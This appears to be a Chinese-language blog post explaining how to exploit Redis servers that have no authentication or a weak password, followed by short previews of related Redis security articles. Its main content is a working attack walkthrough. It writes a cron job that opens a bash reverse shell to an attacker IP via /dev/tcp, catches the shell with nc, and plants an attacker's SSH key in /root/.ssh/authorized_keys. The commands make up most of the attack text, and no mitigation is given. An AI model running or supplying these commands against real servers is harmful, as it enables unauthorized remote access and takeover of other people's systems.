redis弱密码漏洞利用

VSole2021-11-25 07:00:19

背景:

redis无认证,或者弱密码,可以成功连接到redis服务器

反弹shell拿到的权限取决于redis的启动账号

操作:

1. Centos7安装redis客户端

#yum install redis      --查看是否有redis   yum 源#yum install epel-release    --下载fedora的epel仓库# yum install redis    -- 安装redis数据库

【漏洞利用方法1 写crontab,反弹shell】

2.连接redis服务器,执行命令

#redis-cli -h 10.1.1.2 -a 123456 //如果没有密码,不用添加-a参数10.1.1.2:6379> config set dir /var/spool/cronOK10.1.1.2:6379> config set dbfilename rootOK10.1.1.2:6379> set xxoo "*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1"10.1.1.2:6379>saveOK

上面的方法是需要先连接到redis服务器,然后再执行命令,也可以直接执行命令,无需连接

#echo -e "*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1"|redis-cli -h 192.168.118.129 -a 123456 -x set 1#redis-cli -h 192.168.118.129 -a 123456 config set dir /var/spool/cron/#redis-cli -h 192.168.118.129 -a 123456 config set dbfilename root#redis-cli -h 192.168.118.129 -a 123456 save 

3.在 10.1.1.1上执行

#nc -l -p 1234 -vv //监听1234端口

很快就能收到shell

【漏洞利用方法2 写authorized_keys 实现无密码登录】

 执行命令如下:

127.0.0.1:6379>flushallOK
127.0.0.1:6379>config set dir /root/.ssh/OK
127.0.0.1:6379>config set dbfilename authorized_keysOK
127.0.0.1:6379>set xxoo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxna91qSLsy9sbYSZNYMpe0root@localhost.localdomain"OK
127.0.0.1:6379>saveOK

然后ssh 连接目标服务器即可

redisconfig
本作品采用《CC 协议》,转载必须注明作者和本文链接
.Net之延迟队列
2022-07-27 17:54:49
介绍具有队列的特性,再给它附加一个延迟消费队列消息的功能,也就是说可以指定队列中的消息在哪个时间点被消费。
NoSQL,泛指非关系型的数据库。NoSQL有时也称作Not Only SQL的缩写,是对不同于传统的关系型数据库的数据库管理系统的统称。NoSQL用于超大规模数据的存储。(例如谷歌或Facebook每天为他们的用户收集万亿比特的数据)。这些类型的数据存储不需要固定的模式,无需多余操作就可以横向扩展。 分类
起因舍友在宿舍喊着,这服务器好卡啊,难受啊!一看吓一跳,一个叫做sysupdate的进程占据了绝大部分的CPU资源。CPU使用率接近100%。看来被挖矿是坐实了。清除过程确定病因这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。查看病毒的PID号。发现sysupdate的绝对路径在/etc/sysupdate。紧接着拼接curl下载并执行远程shell的语句,并调用Save写入文件中。sysguard作者叫他是Watchdog,主要功能就是监控自己的各程序,定时任务等是否启动正常。
redis弱密码漏洞利用
2021-11-25 07:00:19
redis无认证,或者弱密码,可以成功连接到redis服务器 反弹shell拿到的权限取决于redis的启动账号 操作: 1. Centos7安装redis客户端 #yum install redis --查看是否有redis yum 源#yum install epel-release --下载fedora的epel仓库# yum install redis -
Redis未授权漏洞
2021-11-19 22:05:17
Redis 默认情况下,会绑定在 本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证的情况下,任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。靶机是Jacky马的服务器,快到期了就没脱敏。
Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持
Redis系列漏洞总结
2023-06-19 10:29:18
前言Redis的未授权漏洞一直都是一个很火的漏洞,最近看许多前辈的文章自己复现后,根据自己的实践再次总结一下,为日后复习方便回顾。Redis简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。
2在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。
提及 Redis 自然是耳熟能详,说起 Redis 的漏洞的话,未授权访问漏洞、主从复制漏洞等也是张口就来,所以打算对 Redis 进行一个全面的总结。
7月22日,Redis官方发布了Redis远程代码执行漏洞的风险通告,漏洞编号为CVE-2021-32761。建议受影响用户及时升级到安全版本进行防护,并做好资产自查以及预防工作,以免遭受黑客攻击。
VSole
网络安全专家